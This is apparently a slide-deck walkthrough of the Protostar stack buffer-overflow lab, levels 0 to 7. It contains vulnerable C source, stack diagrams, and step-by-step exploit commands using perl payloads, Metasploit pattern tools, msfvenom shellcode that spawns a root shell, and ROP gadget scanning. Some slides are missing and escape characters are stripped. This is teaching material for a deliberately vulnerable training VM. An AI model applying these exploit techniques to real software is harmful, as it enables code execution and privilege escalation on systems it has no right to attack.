The buffer overflow vulnerability in Level 6 can be exploited by overwriting the return address on the stack to redirect execution flow. The return address can be overwritten with a format string pointing to shellcode stored elsewhere in memory. The shellcode executes to provide a shell, avoiding detection methods in the binary. Precise offsets must be determined through pattern creation and debugging to successfully exploit the vulnerability.
2. What Is A Buffer Overflow?
A buffer overflow occurs when a program or process tries to
store more data in a buffer (temporary data storage area)
than it was intended to hold. Since buffers are created to
contain a finite amount of data, the extra information -
which has to go somewhere - can overflow into adjacent
buffers, corrupting or overwriting the valid data held in
them.
3. Tools In Use
Perl – Inline perl expressions, either using $( expression ) or expression | program,
depending on the need. Used to quickly
GDB – GNU Debugger, allows debugging of applications, inspecting of live
variables, memory, and registers. Crash dumps know as core files can also be
analyzed in the same manors.
Metasploit Console: In ../msf/tools
Pattern_Create.rb – Creates a specialized pattern that can be used to identify
how many bytes into a buffer important locations are such as EIP or
variables
Pattern_Offset.rb – Based on a small subset of bytes returned from overflowed
buffers filled with patterns from pattern_create, this locates how far into
the buffer the bytes that returned are.
Venom – Creates shellcode, with the ability to change function, and encode
shellcode to avoid bad characters and detection.
4. Preparing Protostar
In virtual console window
Login
User: root
Pass: godmode
Get an IP
dhclient & ifconfig | grep “inet addr”
5. Preparing Protostar Cont.
Login
ssh user@[IP]
Pass: user
Unlimit core dumps
ulimit -c unlimited
ulimit -a | grep core
Change to bash shell
/bin/bash
Change to binary dir
cd /opt/protostar/bin/
6. Level 0
(Source)
int main(int argc, char **argv) {
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variablen");
} else {
printf("Try again?n");
}
}
7. Level 0
(Diagram)
The Stack
Previous Stack Frames
Contains previous EIP & ESP
Int modified = 0
Char buffer = 64 bytes
Uninitalized
stack space
8. Level 0
(Solution)
/opt/protostar/bin$ ./stack0
test
Try again?
/opt/protostar/bin$ perl -e 'print "a"x68' | ./stack0
you have changed the 'modified' variable
9. Level 1
(source)
int main(int argc, char **argv) {
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argumentn");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right valuen");
} else {
printf("Try again, you got 0x%08xn", modified);
}
}
10. Level 1
The Stack (Diagram)
Previous Stack Frames
Contains previous EIP & ESP
Int modified = 0
Modified == 0x61626364
Char buffer = 64 bytes
Uninitalized
stack space
11. Level 1
(Solution)
./stack1 test
Try again, you got 0x00000000
./stack1 $(perl -e 'print "a"x70')
Try again, you got 0x61616161
./pattern_create.rb 70
[MSF Pattern]
./stack1 [MSF Pattern]
Try again, you got 0x63413163
./pattern_offset.rb 63413163 = 64 bytes
./stack1 $(perl -e 'print "a"x64 . "x64x63x62x61nr"')
you have correctly got the variable to the right value
12. Level 2
(Source)
int main(int argc, char **argv) {
volatile int modified;
char buffer[64];
char *variable;
variable = getenv("GREENIE");
if(variable == NULL) {
errx(1, "please set the GREENIE environment variablen");
}
modified = 0;
strcpy(buffer, variable);
if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variablen");
} else {
printf("Try again, you got 0x%08xn", modified);
}
}
22. Level 5
The Stack (Diagram)
Previous Stack Frames
Contains previous EIP & ESP
Overwritten with nop sled and
Shellcode.
Current EIP – must be overwritten
to point to our shellcode
EIP = 0x08048424
Char buffer = 76 bytes
int main(int argc, char **argv) {
Uninitalized
stack space char buffer[64];
gets(buffer);
}
23. Level 5
(Solution 1)
perl -e 'print "a"x80' | ./stack5
Segmentation fault
./pattern_create.rb 80
[MSF Pattern]
Gdb –-quiet ./stack5
run
[MSF Pattern]
Program received signal SIGSEGV, Segmentation fault.
0x63413563 in ?? ()
(gdb) x $esp
0xbffff7c0
./pattern_offset.rb 63413563 = 76 bytes
Location of EIP = 0xbffff760 + 76h = 0xbffff7d6
24. Level 5
(Solution 2)
msfvenom -p linux/x86/exec -f pl -b 'x00xff' CMD=/bin/bash PrependSet
resuid=true = ~70bytes
perl -e 'print "a"x76 . "xc0xf7xffxbf" . "x90"x16 .
"xdbxd3xd9x74x24xf4x5dxbbx62x1axd1xfex2bxc9
xb1x0bx83xedxfcx31x5dx16x03x5dx16xe2x97x70xdaxa6xce
xd7xbax3exddxb4xcbx58x75x14xbfxcex85x02x10x6dxecxbc
xe7x92xbcxa8xf0x54x40x29x2ex37x29x47x1fxc4xc1x97x08
x79x98x79x7bxfd"' | ./stack5
Result: Program exits cleanly without executing a shell.
Reason: /bin/dash has issues with the incoming stdin from the original
Program. It must check for this issue and close automatically. This
Is due to the gets() function being used.
More Details: StackOverflow.com
27. Level 6
The Stack (Diagram)
Previous Stack Frames
Current EIP
Char buffer = 64 bytes
Uninitalized
stack space
28. Level 6
The Stack (Diagram 2)
This address
Address of SHELLCODE
Address of SHELLCODE
Address of FORMATSTRING
Address of execl()
Address of printf()
Previously EIP
Char buffer = 64 bytes
Uninitalized
stack space
36. Level 7
(Solution 1)
./pattern_create.rb 100
[MSF Pattern]
gdb –-quiet ./stack7
input path please: [MSF Pattern]
Program received signal SIGSEGV, Segmentation fault.
0x37634136 in ?? ()
./pattern_offset.rb 0x37634136
80
37. Level 7
(Solution 2)
scp user@192.168.1.10:/opt/protostar/bin/stack7 ~/stack7
msfelfscan -j edx ~/stack7
[~/stack7]
msfelfscan -p ~/stack7
[~/stack7]
0x08048492 pop ebx; pop ebp; ret
0x080485c7 pop edi; pop ebp; ret
0x080485f7 pop ebx; pop ebp; ret
38. Level 7
(Solution 3)
perl -e 'print "a"x80 . "x92x84x04x08" . "c"x100' > /tmp/7-test
gdb --quiet ./stack7
(gdb) run < /tmp/7-test
Program received signal SIGSEGV, Segmentation fault.
0x63636363 in ?? ()
./pattern_create.rb 50
[MSF Pattern]
perl -e 'print "a"x80 . "x92x84x04x08" . "[MSF Pattern]”’ > /tmp/7-test
gdb --quiet ./stack7
(gdb) run < /tmp/7-test
Program received signal SIGSEGV, Segmentation fault.
0x33614132 in ?? ()
39. Level 7
(Solution 4)
./pattern_offset.rb 0x33614132
8
perl -e 'print "a"x80 . "x92x84x04x08" . "C"x8 . "D"x4' > /tmp/7-test
gdb --quiet ./stack7
(gdb) run < /tmp/7-test
Starting program: /opt/protostar/bin/stack7 < /tmp/7-test
Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? ()
msfvenom -p linux/x86/exec -f pl -b 'xcox04x00xff' CMD='touch
/tmp/touch' PrependSet resuid=true
[MSF Shellcode]
export SHELLCODE=`perl -e 'print “[MSF Shellcode]"'`
~/getenvaddr SHELLCODE ./stack7
SHELLCODE will be at 0xbffff960